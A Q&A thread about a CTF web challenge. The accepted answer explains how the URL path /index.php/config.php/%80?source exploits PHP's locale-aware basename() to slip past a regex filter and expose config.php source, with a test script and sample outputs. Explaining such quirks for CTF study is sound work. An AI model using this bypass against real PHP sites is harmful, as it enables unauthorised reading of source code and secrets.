# How does the hex value in an URL change the path of the file?

Tags: php, url-routing, web-development-server, ctf

I'm working on a challenge in CTF. Here's the link to the challenge: [Link1](http://18.179.178.246:8003/)

When I try to change the path to [Link2](http://18.179.178.246:8003/index.php/config.php/%80?source).

it successfully retrieved the flag but when the hex value is less than 80, it doesn't work.

I'm a beginner and did a lot of digging to find out how but I couldn't find any. May I ask how so?

Comment: I would say: "guessing random bytes is unintended solution".

Answer (score 1, accepted):

It appears that the challenge is exploiting a quirk of PHP's `basename()` function. [As per the documentation:](https://www.php.net/basename)

> **Caution:** 
>   `basename()` is locale aware, so for it to see the correct basename with multibyte character paths, the matching locale must be set using the `setlocale()` function.

What this means is that if you pass it a string that contains code points higher than 0x7F, then it will try to process them as multi-byte characters. Passing random bytes to this function is therefore likely to make it fall over.

I uploaded the following script to a server for testing:

```
<?php

header("Content-Type: text/plain; charset=UTF-8");

echo '$_SERVER["PATH_INFO"] = ';
var_dump($_SERVER['PATH_INFO']);
echo '$_SERVER["PHP_SELF"] = ';
var_dump($_SERVER['PHP_SELF']);
echo 'basename($_SERVER["PHP_SELF"]) = ';
var_dump(basename($_SERVER['PHP_SELF']));
```

And here are the results I obtained with a few chosen requests:

■ ***`GET /index.php?source`***

```php
$_SERVER["PATH_INFO"] = NULL
$_SERVER["PHP_SELF"] = string(15) "/index.php"
basename($_SERVER["PHP_SELF"]) = string(9) "index.php"
```

■ ***`GET /index.php/config.php?source`***

```php
$_SERVER["PATH_INFO"] = string(11) "/config.php"
$_SERVER["PHP_SELF"] = string(26) "/index.php/config.php"
basename($_SERVER["PHP_SELF"]) = string(10) "config.php"
```

■ ***`GET /index.php/config.php/XXX?source`***

```php
$_SERVER["PATH_INFO"] = string(15) "/config.php/XXX"
$_SERVER["PHP_SELF"] = string(30) "/index.php/config.php/XXX"
basename($_SERVER["PHP_SELF"]) = string(3) "XXX"
```

■ ***`GET /index.php/config.php/%F0%9F%98%80?source`***

```php
$_SERVER["PATH_INFO"] = string(16) "/config.php/"
$_SERVER["PHP_SELF"] = string(31) "/index.php/config.php/"
basename($_SERVER["PHP_SELF"]) = string(10) "config.php"
```

You'll notice that in the last example, PHP has failed to parse the UTF-8 character at the end of the `PATH_INFO` string, and has defaulted to the preceding value of `config.php` instead.

So in the example you gave, the link to `/index.php/config.php/%80?source` would have resulted in `$_SERVER["PHP_SELF"]` taking a value of `"config.php"`. This allows your query to pass the following test because `$_SERVER['PHP_SELF']` ends with `\x80`, not `/`:

```php
if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
  exit("I don't know what you are thinking, but I won't let you read it :)");
}
```

And so you're able to obtain the flag from the source code of `config.php`.

An interesting challenge.

---

**Note:** If you set PHP's locale to something that accepts UTF-8 characters (e.g., `setlocale(LC_ALL, 'en_GB.UTF8');`), then it will handle the  characters correctly, but will still fall down when given an invalid code point like `%80`.